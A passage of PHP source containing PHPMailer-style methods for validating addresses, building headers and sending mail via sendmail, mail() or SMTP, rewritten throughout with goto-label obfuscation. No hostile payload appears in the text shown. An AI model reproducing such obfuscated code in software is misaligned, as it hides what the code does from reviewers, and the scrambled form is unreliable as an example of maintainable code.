$address = trim($address); goto HuYsL; HLIUC: $this->edebug($error_message); goto Jl5Gs; c88W0: } public function getLastMessageID() { return $this->lastMessageID; } public static function validateAddress($address, $patternselect = null) { goto PXDWm; NdZbZ: X5uiH: goto qH60F; Eum1I: if (function_exists("extension_loaded") and extension_loaded("pcre")) { goto nm47t; } goto b30lh; PXDWm: if (!is_null($patternselect)) { goto VuzDp; } goto Y08Fk; O1Q8E: T8sEf: goto ob11I; Vll62: $patternselect = "noregex"; goto GJob3; HdvVm: $patternselect = "pcre"; goto E6rUv; leqTK: $patternselect = "pcre"; goto eBUsN; eZ7na: ZAh8Z: goto zeow2; NFqCR: if (!(strpos($address, "\xa") !== false or strpos($address, "\xd") !== false)) { goto i_n47; } goto JXquj; UK70w: Er010: goto GXbLX; hEjJ8: BYsq3: goto hWgzt; b30lh: if (version_compare(PHP_VERSION, "5.2.0") >= 0) { goto ZAh8Z; } goto Vll62; JXquj: return false; goto LQwmq; GzhMf: if (version_compare(PCRE_VERSION, "8.0.3") >= 0) { goto T8sEf; } goto HdvVm; E6rUv: goto WK5z7; goto O1Q8E; SCjRe: VuzDp: goto dLK3b; ea7SF: z7xfp: goto NFqCR; ob11I: $patternselect = "pcre8"; goto g8SSD; cKZen: return call_user_func($patternselect, $address); goto ea7SF; nmdkM: if (defined("PCRE_VERSION")) { goto yZknR; } goto Eum1I; U2P_n: C3hbR: goto UK70w; GJob3: goto X5uiH; goto eZ7na; Y08Fk: $patternselect = self::$validator; goto SCjRe; SIky2: goto cEF_v; goto nNZRO; nNZRO: nm47t: goto leqTK; eBUsN: cEF_v: goto hEjJ8; qH60F: goto cEF_v; goto PaCHH; PaCHH: yZknR: goto GzhMf; LQwmq: i_n47: goto EDOm2; hWgzt: switch ($patternselect) { case "pcre8": return (bool) preg_match("/^(?!(?>(?1)"?(?>\\[ -~]|[^"])"?(?1)){255,})(?!(?>(?1)"?(?>\\[ -~]|[^"])"?(?1)){65,}@)" . "((?>(?>(?>((?>(?>(?>\x0D\x0A)?[\t ])+|(?>[\t ]*\x0D\x0A)?[\t ]+)?)(\((?>(?2)" . "(?>[\x01-\x08\x0B\x0C\x0E-'*-\[\]-\x7F]|\\[\x00-\x7F]|(?3)))*(?2)\)))+(?2))|(?2))?)" . "([!#-'*+\/-9=?^-~-]+|"(?>(?2)(?>[\x01-\x08\x0B\x0C\x0E-!#-\[\]-\x7F]|\\[\x00-\x7F]))*" . "(?2)")(?>(?1)\.(?1)(?4))*(?1)@(?!(?1)[a-z0-9-]{64,})(?1)(?>([a-z0-9](?>[a-z0-9-]*[a-z0-9])?)" . "(?>(?1)\.(?!(?1)[a-z0-9-]{64,})(?1)(?5)){0,126}|\[(?:(?>IPv6:(?>([a-f0-9]{1,4})(?>:(?6)){7}" . "|(?!(?:.*[a-f0-9][:\]]){8,})((?6)(?>:(?6)){0,6})?::(?7)?))|(?>(?>IPv6:(?>(?6)(?>:(?6)){5}:" . "|(?!(?:.*[a-f0-9]:){6,})(?8)?::(?>((?6)(?>:(?6)){0,4}):)?))?(25[0-5]|2[0-4][0-9]|1[0-9]{2}" . "|[1-9]?[0-9])(?>\.(?9)){3}))\])(?1)$/isD", $address); case "pcre": return (bool) preg_match("/^(?!(?>"?(?>\\[ -~]|[^"])"?){255,})(?!(?>"?(?>\\[ -~]|[^"])"?){65,}@)(?>" . "[!#-'*+\/-9=?^-~-]+|"(?>(?>[\x01-\x08\x0B\x0C\x0E-!#-\[\]-\x7F]|\\[\x00-\xFF]))*")" . "(?>\.(?>[!#-'*+\/-9=?^-~-]+|"(?>(?>[\x01-\x08\x0B\x0C\x0E-!#-\[\]-\x7F]|\\[\x00-\xFF]))*"))*" . "@(?>(?![a-z0-9-]{64,})(?>[a-z0-9](?>[a-z0-9-]*[a-z0-9])?)(?>\.(?![a-z0-9-]{64,})" . "(?>[a-z0-9](?>[a-z0-9-]*[a-z0-9])?)){0,126}|\[(?:(?>IPv6:(?>(?>[a-f0-9]{1,4})(?>:" . "[a-f0-9]{1,4}){7}|(?!(?:.*[a-f0-9][:\]]){8,})(?>[a-f0-9]{1,4}(?>:[a-f0-9]{1,4}){0,6})?" . "::(?>[a-f0-9]{1,4}(?>:[a-f0-9]{1,4}){0,6})?))|(?>(?>IPv6:(?>[a-f0-9]{1,4}(?>:" . "[a-f0-9]{1,4}){5}:|(?!(?:.*[a-f0-9]:){6,})(?>[a-f0-9]{1,4}(?>:[a-f0-9]{1,4}){0,4})?" . "::(?>(?:[a-f0-9]{1,4}(?>:[a-f0-9]{1,4}){0,4}):)?))?(?>25[0-5]|2[0-4][0-9]|1[0-9]{2}" . "|[1-9]?[0-9])(?>\.(?>25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])){3}))\])$/isD", $address); case "html5": return (bool) preg_match("/^[a-zA-Z0-9.!#$%&'*+\/=?^_`{|}~-]+@[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}" . "[a-zA-Z0-9])?(?:\.[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*$/sD", $address); case "noregex": return strlen($address) >= 3 and strpos($address, "@") >= 1 and strpos($address, "@") != strlen($address) - 1; case "php": default: return (bool) filter_var($address, FILTER_VALIDATE_EMAIL); } goto U2P_n; g8SSD: WK5z7: goto SIky2; dLK3b: if (!is_callable($patternselect)) { goto z7xfp; } goto cKZen; zeow2: $patternselect = "php"; goto NdZbZ; EDOm2: if (!(!$patternselect or $patternselect == "auto")) { goto BYsq3; } goto nmdkM; GXbLX: } public function idnSupported() { return function_exists("idn_to_ascii") and function_exists("mb_convert_encoding"); } public function punyencodeAddress($address) { goto DZBEj; mgg0H: mWaNn: goto JUWmW; nSEpS: return substr($address, 0, $pos) . $punycode; goto mgg0H; zUzCI: $domain = substr($address, ++$pos); goto Y7VKJ; CnlXw: if (!(($punycode = defined("INTL_IDNA_VARIANT_UTS46") ? idn_to_ascii($domain, 0, INTL_IDNA_VARIANT_UTS46) : idn_to_ascii($domain)) !== false)) { goto mWaNn; } goto nSEpS; JUWmW: gSXTg: goto zQfAL; DZBEj: if (!($this->idnSupported() and !empty($this->CharSet) and ($pos = strrpos($address, "@")) !== false)) { goto dlyR3; } goto zUzCI; Y7VKJ: if (!($this->has8bitChars($domain) and @mb_check_encoding($domain, $this->CharSet))) { goto gSXTg; } goto nP7F2; exkxa: return $address; goto ERDJ9; nP7F2: $domain = mb_convert_encoding($domain, "UTF-8", $this->CharSet); goto CnlXw; zQfAL: dlyR3: goto exkxa; ERDJ9: } public function send() { try { goto pDwCs; DxqUG: return $this->postSend(); goto oeeSx; pDwCs: if ($this->preSend()) { goto jbIv5; } goto cTQz_; mFbbP: jbIv5: goto DxqUG; cTQz_: return false; goto mFbbP; oeeSx: } catch (phpmailerException $exc) { goto bv2Zd; KgSro: $this->setError($exc->getMessage()); goto LyqR4; yXSSI: throw $exc; goto MDswX; LyqR4: if (!$this->exceptions) { goto VzNgy; } goto yXSSI; bv2Zd: $this->mailHeader = ''; goto KgSro; MDswX: VzNgy: goto ZC1bq; ZC1bq: return false; goto d3g3o; d3g3o: } } public function preSend() { try { goto xEM9x; BuasM: YNq_H: goto ro_cH; yWJv6: PoUQY: goto wowh4; xVlcp: $this->MIMEHeader = $this->createHeader(); goto zqJBi; G4tuo: nheWh: goto Bs1KA; eqC2A: $this->MIMEHeader = rtrim($this->MIMEHeader, "
\xa ") . self::CRLF . str_replace("
", "
", $header_dkim) . self::CRLF; goto SAak2; xEM9x: $this->error_count = 0; goto IoBzX; JxdTo: if (!(!$this->AllowEmpty and empty($this->Body))) { goto xo_fg; } goto rna6M; SAak2: aw2Cf: goto kTDIo; IoBzX: $this->mailHeader = ''; goto f6TRx; ZpHWL: kGWyj: goto yMN0A; jjDup: throw new phpmailerException($this->lang("provide_address"), self::STOP_CRITICAL); goto G4tuo; p4UfY: ihlwK: goto HEs84; ro_cH: if (!(!empty($this->DKIM_domain) and !empty($this->DKIM_selector) and (!empty($this->DKIM_private_string) or !empty($this->DKIM_private) and self::isPermittedPath($this->DKIM_private) and file_exists($this->DKIM_private)))) { goto aw2Cf; } goto qWcHK; f6TRx: foreach (array_merge($this->RecipientsQueue, $this->ReplyToQueue) as $params) { goto XarMG; GgQNr: call_user_func_array(array($this, "addAnAddress"), $params); goto SipHb; XarMG: $params[1] = $this->punyencodeAddress($params[1]); goto GgQNr; SipHb: FXtog: goto WZjJS; WZjJS: } goto p4UfY; zqJBi: $this->MIMEHeader .= $tempheaders; goto vz6Fb; yMN0A: if (!$this->alternativeExists()) { goto FKQ0L; } goto lDqWy; Phj_d: $this->mailHeader .= $this->headerLine("To", "undisclosed-recipients:;"); goto vxRuM; HEs84: if (!(count($this->to) + count($this->cc) + count($this->bcc) < 1)) { goto nheWh; } goto jjDup; F6SPW: $this->MIMEHeader = ''; goto eiiV1; nbTAD: u5jos: goto p39JL; kTDIo: return true; goto qG6Xy; qNhCY: if (count($this->to) > 0) { goto PoUQY; } goto Phj_d; vz6Fb: if (!($this->Mailer == "mail")) { goto YNq_H; } goto qNhCY; lDqWy: $this->ContentType = "multipart/alternative"; goto I9vkQ; rna6M: throw new phpmailerException($this->lang("empty_message"), self::STOP_CRITICAL); goto x0WWV; x0WWV: xo_fg: goto F6SPW; wowh4: $this->mailHeader .= $this->addrAppend("To", $this->to); goto nbTAD; NaOEC: $tempheaders = $this->MIMEHeader; goto xVlcp; vxRuM: goto u5jos; goto yWJv6; I9vkQ: FKQ0L: goto O8c1b; qWcHK: $header_dkim = $this->DKIM_Add($this->MIMEHeader . $this->mailHeader, $this->encodeHeader($this->secureHeader($this->Subject)), $this->MIMEBody); goto eqC2A; O8c1b: $this->setMessageType(); goto JxdTo; Bs1KA: foreach (array("From", "Sender", "ConfirmReadingTo") as $address_kind) { goto iDoEZ; foFXB: goto Yb6Qh; goto wR7tM; iDoEZ: $this->{$address_kind} = trim($this->{$address_kind}); goto n_hQy; puFZW: return false; goto ZmyEf; MuXEN: Yb6Qh: goto Ztao_; jWqx3: $error_message = $this->lang("invalid_address") . " (punyEncode) " . $this->{$address_kind}; goto KuSEI; qS5LN: if ($this->validateAddress($this->{$address_kind})) { goto SbDvL; } goto jWqx3; J7Z5d: nBjpA: goto puFZW; eblrn: throw new phpmailerException($error_message); goto J7Z5d; vrCnj: $this->{$address_kind} = $this->punyencodeAddress($this->{$address_kind}); goto qS5LN; wR7tM: XltkN: goto vrCnj; Oho7S: $this->edebug($error_message); goto Wv75y; n_hQy: if (!empty($this->{$address_kind})) { goto XltkN; } goto foFXB; Wv75y: if (!$this->exceptions) { goto nBjpA; } goto eblrn; KuSEI: $this->setError($error_message); goto Oho7S; ZmyEf: SbDvL: goto MuXEN; Ztao_: } goto ZpHWL; eiiV1: $this->MIMEBody = $this->createBody(); goto NaOEC; p39JL: $this->mailHeader .= $this->headerLine("Subject", $this->encodeHeader($this->secureHeader(trim($this->Subject)))); goto BuasM; qG6Xy: } catch (phpmailerException $exc) { goto lLFgZ; sE2Pv: if (!$this->exceptions) { goto tYoqv; } goto BoEO5; lLFgZ: $this->setError($exc->getMessage()); goto sE2Pv; F0x4J: tYoqv: goto OXgQ9; BoEO5: throw $exc; goto F0x4J; OXgQ9: return false; goto uo8Cl; uo8Cl: } } public function postSend() { try { goto X6n0M; nrLj6: OJ65Q: goto x_lJk; X6n0M: switch ($this->Mailer) { case "sendmail": case "qmail": return $this->sendmailSend($this->MIMEHeader, $this->MIMEBody); case "smtp": return $this->smtpSend($this->MIMEHeader, $this->MIMEBody); case "mail": return $this->mailSend($this->MIMEHeader, $this->MIMEBody); default: goto qohnd; a6vsS: if (!method_exists($this, $sendMethod)) { goto ADIof; } goto IWSDV; qohnd: $sendMethod = $this->Mailer . "Send"; goto a6vsS; b3n9r: ADIof: goto X2x1S; IWSDV: return $this->{$sendMethod}($this->MIMEHeader, $this->MIMEBody); goto b3n9r; X2x1S: return $this->mailSend($this->MIMEHeader, $this->MIMEBody); goto algQK; algQK: } goto nrLj6; x_lJk: FPZWf: goto bBud4; bBud4: } catch (phpmailerException $exc) { goto cuXtC; rUH31: throw $exc; goto v_M0r; cuXtC: $this->setError($exc->getMessage()); goto Teml5; Teml5: $this->edebug($exc->getMessage()); goto fve1g; v_M0r: kY42_: goto Zyqyc; fve1g: if (!$this->exceptions) { goto kY42_; } goto rUH31; Zyqyc: } return false; } protected function sendmailSend($header, $body) { goto muTZj; muTZj: if (!empty($this->Sender) and self::isShellSafe($this->Sender)) { goto zlt_L; } goto vChyt; cv6Ql: throw new phpmailerException($this->lang("execute") . $this->Sendmail, self::STOP_CRITICAL); goto VVSMY; l3rrL: CXSgD: goto jO1d1; Ao5yr: $result = pclose($mail); goto H2CCP; vChyt: if ($this->Mailer == "qmail") { goto CXSgD; } goto MPjaI; BL5vh: return true; goto VaYOV; Gzuun: foreach ($this->SingleToArray as $toAddr) { goto WUC0l; YETFm: rmVRV: goto iO1hY; pzets: throw new phpmailerException($this->lang("execute") . $this->Sendmail, self::STOP_CRITICAL); goto fvaAy; WUC0l: if (@($mail = popen($sendmail, "w"))) { goto oYVZ5; } goto pzets; wH1JH: if (!($result != 0)) { goto KTGUS; } goto mgOAd; p1Aon: fputs($mail, $header); goto izrPl; hW1a1: $result = pclose($mail); goto iUkxB; rskuf: KTGUS: goto YETFm; iUkxB: $this->doCallback($result == 0, array($toAddr), $this->cc, $this->bcc, $this->Subject, $body, $this->From); goto wH1JH; mgOAd: throw new phpmailerException($this->lang("execute") . $this->Sendmail, self::STOP_CRITICAL); goto rskuf; rqQf2: fputs($mail, "To: " . $toAddr . "
"); goto p1Aon; fvaAy: oYVZ5: goto rqQf2; izrPl: fputs($mail, $body); goto hW1a1; iO1hY: } goto yrB8W; uA7BH: if ($this->SingleTo) { goto nZA84; } goto MyDfH; KWh8M: if ($this->Mailer == "qmail") { goto SW6G8; } goto wIoqD; wIoqD: $sendmailFmt = "%s -oi -f%s -t"; goto DJHBQ; VVSMY: Wx_I3: goto IOZd0; etmcz: PhPC9: goto Nh7xG; vkrCd: MY6Vz: goto c5yQO; uAYW_: zVkR5: goto gOdc5; jO1d1: $sendmailFmt = "%s"; goto uAYW_; MyDfH: if (@($mail = popen($sendmail, "w"))) { goto Wx_I3; } goto cv6Ql; MPjaI: $sendmailFmt = "%s -oi -t"; goto mfcv1; yrB8W: pGVuc: goto YcuFu; IOZd0: fputs($mail, $header); goto lGeDj; qkS7u: SW6G8: goto D09iM; gOdc5: goto PhPC9; goto vIPkR; D09iM: $sendmailFmt = "%s -f%s"; goto hUFxR; vIPkR: zlt_L: goto KWh8M; DJHBQ: goto dPoDt; goto qkS7u; mfcv1: goto zVkR5; goto l3rrL; pXG8L: nZA84: goto Gzuun; c5yQO: goto cxyHE; goto pXG8L; rw_ty: throw new phpmailerException($this->lang("execute") . $this->Sendmail, self::STOP_CRITICAL); goto vkrCd; H2CCP: $this->doCallback($result == 0, $this->to, $this->cc, $this->bcc, $this->Subject, $body, $this->From); goto PSocC; Nh7xG: $sendmail = sprintf($sendmailFmt, escapeshellcmd($this->Sendmail), $this->Sender); goto uA7BH; lGeDj: fputs($mail, $body); goto Ao5yr; PSocC: if (!($result != 0)) { goto MY6Vz; } goto rw_ty; YcuFu: cxyHE: goto BL5vh; hUFxR: dPoDt: goto etmcz; VaYOV: } protected static function isShellSafe($string) { goto IKMut; Mp5gU: return false; goto coc2V; f3QiC: $i++; goto xr33x; coc2V: nEXhD: goto WLaPX; hbKCq: return false; goto e2Dli; SxKUQ: $i = 0; goto C9zJE; e2Dli: OdRXu: goto za9Rm; IKMut: if (!(escapeshellcmd($string) !== $string or !in_array(escapeshellarg($string), array("'{$string}'", ""{$string}"")))) { goto OdRXu; } goto hbKCq; ZEwt_: if (!(!ctype_alnum($c) && strpos("@_-.", $c) === false)) { goto nEXhD; } goto Mp5gU; TJe8y: if (!($i < $length)) { goto MCgB2; } goto t2ff1; WLaPX: G5SxX: goto f3QiC; t2ff1: $c = $string[$i]; goto ZEwt_; za9Rm: $length = strlen($string); goto SxKUQ; Z7GF5: MCgB2: goto i83fU; xr33x: goto wCuUi; goto Z7GF5; i83fU: return true; goto ELNeD; C9zJE: wCuUi: goto TJe8y; ELNeD: } protected static function isPermittedPath($path) { return !preg_match("#^[a-z]+://#i", $path); } protected function mailSend($header, $body) { goto ysJxT; gDcPL: foreach ($toArr as $toAddr) { goto AfFj4; j_WQo: b_KfG: goto cfkz4; Fk7IX: $this->doCallback($result, array($toAddr), $this->cc, $this->bcc, $this->Subject, $body, $this->From); goto j_WQo; AfFj4: $result = $this->mailPassthru($toAddr, $this->Subject, $body, $header, $params); goto Fk7IX; cfkz4: } goto lxiZO; yarIY: Yf5Cn: goto B_mqa; Ly6IK: $params = null; goto bIEME; qmrCp: $to = implode(", ", $toArr); goto Ly6IK; L6BJy: NZz2Z: goto dwuDw; AGH8n: return true; goto pp1q2; cXWqh: pvWoM: goto gDcPL; fpmNf: foreach ($this->to as $toaddr) { $toArr[] = $this->addrFormat($toaddr); s7UCi: } goto fpXcE; fpXcE: kac03: goto qmrCp; lxiZO: KaSjX: goto caDnK; H3GWa: if (!self::isShellSafe($this->Sender)) { goto Yf5Cn; } goto C2ITw; caDnK: VyjYn: goto g5TB1; KMq3L: ini_set("sendmail_from", $old_from); goto G0BCR; Kilqd: throw new phpmailerException($this->lang("instantiate"), self::STOP_CRITICAL); goto bqOzx; Ctw9f: ini_set("sendmail_from", $this->Sender); goto L6BJy; G0BCR: Xj1yV: goto o1vDT; o1vDT: if ($result) { goto wx9lg; } goto Kilqd; B_mqa: FDbgT: goto giYh_; g5TB1: if (!isset($old_from)) { goto Xj1yV; } goto KMq3L; giYh_: if (!(!empty($this->Sender) and !ini_get("safe_mode") and $this->validateAddress($this->Sender))) { goto NZz2Z; } goto jpN52; C2ITw: $params = sprintf("-f%s", $this->Sender); goto yarIY; Ekvv_: if ($this->SingleTo and count($toArr) > 1) { goto pvWoM; } goto ohfcu; ohfcu: $result = $this->mailPassthru($to, $this->Subject, $body, $header, $params); goto ahbHB; ysJxT: $toArr = array(); goto fpmNf; xl5cp: goto VyjYn; goto cXWqh; bqOzx: wx9lg: goto AGH8n; jpN52: $old_from = ini_get("sendmail_from"); goto Ctw9f; ahbHB: $this->doCallback($result, $this->to, $this->cc, $this->bcc, $this->Subject, $body, $this->From); goto xl5cp; bIEME: if (!(!empty($this->Sender) and $this->validateAddress($this->Sender))) { goto FDbgT; } goto H3GWa; dwuDw: $result = false; goto Ekvv_; pp1q2: } public function getSMTPInstance() { goto xgRUl; fR7n5: Tl7ND: goto O2A9I; xgRUl: if (is_object($this->smtp)) { goto Tl7ND; } goto wcQT7; O2A9I: return $this->smtp; goto L9B7X; wcQT7: $this->smtp = new SMTP(); goto fR7n5; L9B7X: } protected function smtpSend($header, $body) { goto E1InE; n5gb8: $smtp_from = $this->Sender; goto OzPCb; Y0kz3: throw new phpmailerException($this->lang("smtp_connect_failed"), self::STOP_CRITICAL); goto OQvK2; MaHDK: throw new phpmailerException($this->ErrorInfo, self::STOP_CRITICAL); goto mQWnQ; E1InE: $bad_rcpt = array(); goto aJUTh; tAQq7: $errstr = ''; goto tf32Q; p_cfu: McPOc: goto PS4oc; OzPCb: BFJuT: goto dHHSc; mvb2x: throw new phpmailerException($this->lang("data_not_accepted"), self::STOP_CRITICAL); goto SIwoi; Eegpt: $this->smtp->reset(); goto yyWwX; oEJTt: HYdJ1: goto xXyA6; ZkIyL: foreach (array($this->to, $this->cc, $this->bcc) as $togroup) { goto uUmcP; T8HNg: SGKmR: goto i4fwV; PTsOb: t4DYy: goto T8HNg; uUmcP: foreach ($togroup as $to) { goto XWbPW; MG7wH: fi4G_: goto XfQvK; wNlVA: $error = $this->smtp->getError(); goto JHOf3; o781W: $isSent = false; goto tuoIf; XWbPW: if (!$this->smtp->recipient($to[0])) { goto yHN2H; } goto kuHYd; YT9lN: $this->doCallback($isSent, array($to[0]), array(), array(), $this->Subject, $body, $this->From); goto MG7wH; kGCrE: yHN2H: goto wNlVA; kuHYd: $isSent = true; goto t4W5h; JHOf3: $bad_rcpt[] = array("to" => $to[0], "error" => $error["detail"]); goto o781W; tuoIf: O5oGN: goto YT9lN; t4W5h: goto O5oGN; goto kGCrE; XfQvK: } goto PTsOb; i4fwV: } goto oEJTt; PS4oc: return true; goto Wup4A; omLNA: throw new phpmailerException($this->lang("recipients_failed") . $errstr, self::STOP_CONTINUE); goto p_cfu; aJUTh: if ($this->smtpConnect($this->SMTPOptions)) { goto gapIm; } goto Y0kz3; V1XIv: $this->smtp->quit(); goto TGL1c; TGL1c: $this->smtp->close(); goto lO8Rx; tf32Q: foreach ($bad_rcpt as $bad) { $errstr .= $bad["to"] . ": " . $bad["error"]; xvNOA: } goto TLZ1b; mQWnQ: vJXW2: goto ZkIyL; dHHSc: if ($this->smtp->mail($smtp_from)) { goto vJXW2; } goto IdvtU; lO8Rx: goto ifnDc; goto Gbs8i; IdvtU: $this->setError($this->lang("from_failed") . $smtp_from . " : " . implode(",", $this->smtp->getError())); goto MaHDK; f5tnr: goto BFJuT; goto sboR_; cOIRG: if (!(count($bad_rcpt) > 0)) { goto McPOc; } goto tAQq7; yyWwX: ifnDc: goto cOIRG; xXyA6: if (!(count($this->all_recipients) > count($bad_rcpt) and !$this->smtp->data($header . $body))) { goto OzuCh; } goto mvb2x; SIwoi: OzuCh: goto vT3xl; sboR_: mFXI8: goto n5gb8; vT3xl: if ($this->SMTPKeepAlive) { goto tBYG3; } goto V1XIv; uuBUp: $smtp_from = $this->From; goto f5tnr; M0iRI: if (!empty($this->Sender) and $this->validateAddress($this->Sender)) { goto mFXI8; } goto uuBUp; OQvK2: gapIm: goto M0iRI; Gbs8i: tBYG3: goto Eegpt; TLZ1b: kD0wz: goto omLNA; Wup4A: } public function smtpConnect($options = null) { goto xBm9X; g_a3B: SOD9G: goto gKaUg; AC0Nc: if (!($this->exceptions and !is_null($lastexception))) { goto lltPl; } goto u2vdV; hnqbu: $this->smtp->setDebugLevel($this->SMTPDebug); goto sIRx8; vAljP: if (!is_null($options)) { goto WUt0m; } goto LuUE3; DrUPP: $this->smtp->close(); goto AC0Nc; mbJoq: lltPl: goto A8OF2; LuUE3: $options = $this->SMTPOptions; goto axwMD; FPTNK: foreach ($hosts as $hostentry) { goto V1DeS; GUt8O: if ($sslext) { goto m5Dpx; } goto pbgLz; pHhO8: if (!$this->smtp->connect($prefix . $host, $port, $this->Timeout, $options)) { goto sA2Om; } goto IjU9J; M_cA2: $this->edebug("Ignoring invalid host: " . $hostentry); goto NJBYU; I3KZg: $prefix = "ssl://"; goto oF8wf; UYegR: $secure = "tls"; goto cvlil; Is_Rt: o2Fua: goto SwQCH; IjU9J: try { goto LNFt3; hJwfB: if (!($this->SMTPAutoTLS and $sslext and $secure != "ssl" and $this->smtp->getServerExt("STARTTLS"))) { goto GOWgG; } goto x_D7G; khsxs: ifKjt: goto GhImm; gef7F: throw new phpmailerException($this->lang("authenticate")); goto cJtfX; GhImm: return true; goto m70Bj; eoqWG: Q6OHO: goto UTSqE; UTSqE: if (!$this->SMTPAuth) { goto ifKjt; } goto hmGQ4; KaDu8: $this->smtp->hello($hello); goto hJwfB; oZYJw: $this->smtp->hello($hello); goto eoqWG; TJSq1: goto yoGEo; goto ECZxr; hmGQ4: if ($this->smtp->authenticate($this->Username, $this->Password, $this->AuthType, $this->Realm, $this->Workstation)) { goto HWsjY; } goto gef7F; nCM0a: $hello = $this->Helo; goto ur4Ra; i31Tn: if (!$tls) { goto Q6OHO; } goto hZs5t; rgBQn: GOWgG: goto i31Tn; ECZxr: syero: goto nCM0a; VPIxn: $hello = $this->serverHostname(); goto TJSq1; yBHL9: throw new phpmailerException($this->lang("connect_host")); goto KHvRP; hZs5t: if ($this->smtp->startTLS()) { goto owGUf; } goto yBHL9; KHvRP: owGUf: goto oZYJw; x_D7G: $tls = true; goto rgBQn; cJtfX: HWsjY: goto khsxs; ur4Ra: yoGEo: goto KaDu8; LNFt3: if ($this->Helo) { goto syero; } goto VPIxn; m70Bj: } catch (phpmailerException $exc) { goto Msdw1; ELoD9: $this->smtp->quit(); goto BRYkJ; UCg0f: $this->edebug($exc->getMessage()); goto ELoD9; Msdw1: $lastexception = $exc; goto UCg0f; BRYkJ: } goto FJFz9; V05v7: if (!($tport > 0 and $tport < 65536)) { goto aRYQa; } goto CnHBQ; KxGaD: $sslext = defined("OPENSSL_ALGO_SHA1"); goto ZXh2z; uIa3f: $secure = $this->SMTPSecure; goto SOWr4; gIdrj: $port = $this->Port; goto ZE8wm; XZO4R: RTCPq: goto rnt0S; V1DeS: $hostinfo = array(); goto hKp86; SwQCH: $tls = true; goto UYegR; TPGBE: goto RRhW0; goto rwwL0; oF8wf: $tls = false; goto yAi0S; GbVXh: aRYQa: goto pHhO8; ZE8wm: $tport = (int) $hostinfo[4]; goto V05v7; FJFz9: sA2Om: goto iwB4C; SOWr4: $tls = $this->SMTPSecure == "tls"; goto Fo8Zl; hKp86: if (preg_match("/^((ssl|tls):\/\/)*([a-zA-Z0-9\.-]*|\[[a-fA-F0-9:]+\]):?([0-9]*)$/", trim($hostentry), $hostinfo)) { goto sNh_2; } goto M_cA2; USGFS: $prefix = ''; goto uIa3f; CnHBQ: $port = $tport; goto GbVXh; cMw6H: goto RRhW0; goto Is_Rt; ZXh2z: if (!("tls" === $secure or "ssl" === $secure)) { goto RTCPq; } goto GUt8O; NJBYU: goto H80_8; goto jzjJQ; rwwL0: yNym4: goto I3KZg; lx8O0: if ($hostinfo[2] == "tls") { goto o2Fua; } goto TPGBE; rnt0S: $host = $hostinfo[3]; goto gIdrj; pbgLz: throw new phpmailerException($this->lang("extension_missing") . "openssl", self::STOP_CRITICAL); goto qkjxd; yAi0S: $secure = "ssl"; goto cMw6H; qkjxd: m5Dpx: goto XZO4R; jzjJQ: sNh_2: goto USGFS; Fo8Zl: if ("ssl" == $hostinfo[2] or '' == $hostinfo[2] and "ssl" == $this->SMTPSecure) { goto yNym4; } goto lx8O0; cvlil: RRhW0: goto KxGaD; iwB4C: H80_8: goto yCoxK; yCoxK: } goto thWTq; v_2hS: $lastexception = null; goto FPTNK; gKaUg: $this->smtp->setTimeout($this->Timeout); goto hnqbu; S2tDz: return true; goto g_a3B; thWTq: nLYxx: goto DrUPP; MQcMU: oVnoa: goto vAljP; axwMD: WUt0m: goto hKhMI; v1Rut: $hosts = explode(";", $this->Host); goto v_2hS; xBm9X: if (!is_null($this->smtp)) { goto oVnoa; } goto Ql_0B; Ql_0B: $this->smtp = $this->getSMTPInstance(); goto MQcMU; A8OF2: return false; goto lkxtm; hKhMI: if (!$this->smtp->connected()) { goto SOD9G; } goto S2tDz; u2vdV: throw $lastexception; goto mbJoq; mibRW: $this->smtp->setVerp($this->do_verp); goto v1Rut; sIRx8: $this->smtp->setDebugOutput($this->Debugoutput); goto mibRW; lkxtm: } public function smtpClose() { goto ctFKF; ctFKF: if (!is_a($this->smtp, "SMTP")) { goto HEIHX; } goto pX_IT; pX_IT: if (!$this->smtp->connected()) { goto ehF8B; } goto VLRfi; VLRfi: $this->smtp->quit(); goto mMnns; F8u4_: ehF8B: goto f1RSR; mMnns: $this->smtp->close(); goto F8u4_; f1RSR: HEIHX: goto n5ZzO; n5ZzO: } public function setLanguage($langcode = "en", $lang_path = '') { goto ADvhz; cAh5w: if (!($langcode != "en")) { goto zyeL4; } goto WZlHW; bMpUB: if (!empty($lang_path)) { goto ve4PI; } goto eLP2m; H5KTV: WQseD: goto pOs2P; W9AXa: if (!isset($renamed_langcodes[$langcode])) { goto WQseD; } goto DBvCB; hhkB5: TgDEM: goto OwMjD; askVI: $foundlang = (include $lang_file); goto UNsXc; ADvhz: $renamed_langcodes = array("br" => "pt_br", "cz" => "cs", "dk" => "da", "no" => "nb", "se" => "sv", "sr" => "rs"); goto W9AXa; Aux1f: bbTnz: goto FTyRb; TEsU4: $this->language = $PHPMAILER_LANG; goto q5JA8; DBvCB: $langcode = $renamed_langcodes[$langcode]; goto H5KTV; UNsXc: goto TgDEM; goto vqiBc; q5JA8: return (bool) $foundlang; goto tgmVn; z_VaE: ve4PI: goto Dhj3Y; tJfuR: $foundlang = false; goto hhkB5; QLI5B: $lang_file = $lang_path . "phpmailer.lang-" . $langcode . ".php"; goto cAh5w; Dhj3Y: if (preg_match("/^[a-z]{2}(?:_[a-zA-Z]{2})?$/", $langcode)) { goto bbTnz; } goto FSjKc; WZlHW: if (!self::isPermittedPath($lang_file) or !is_readable($lang_file)) { goto dzety; } goto askVI; vqiBc: dzety: goto tJfuR; eLP2m: $lang_path = dirname(__FILE__) . DIRECTORY_SEPARATOR . "language" . DIRECTORY_SEPARATOR; goto z_VaE; FSjKc: $langcode = "en"; goto Aux1f; pOs2P: $PHPMAILER_LANG = array("authenticate" => "SMTP Error: Could not authenticate.", "connect_host" => "SMTP Error: Could not connect to SMTP host.", "data_not_accepted" => "SMTP Error: data not accepted.", "empty_message" => "Message body empty", "encoding" => "Unknown encoding: ", "execute" => "Could not execute: ", "file_access" => "Could not access file: ", "file_open" => "File Error: Could not open file: ", "from_failed" => "The following From address failed: ", "instantiate" => "Could not instantiate mail function.", "invalid_address" => "Invalid address: ", "mailer_not_supported" => " mailer is not supported.", "provide_address" => "You must provide at least one recipient email address.", "recipients_failed" => "SMTP Error: The following recipients failed: ", "signing" => "Signing Error: ", "smtp_connect_failed" => "SMTP connect() failed.", "smtp_error" => "SMTP server error: ", "variable_set" => "Cannot set or reset variable: ", "extension_missing" => "Extension missing: "); goto bMpUB; FTyRb: $foundlang = true; goto QLI5B; OwMjD: zyeL4: goto TEsU4; tgmVn: } public function getTranslations() { return 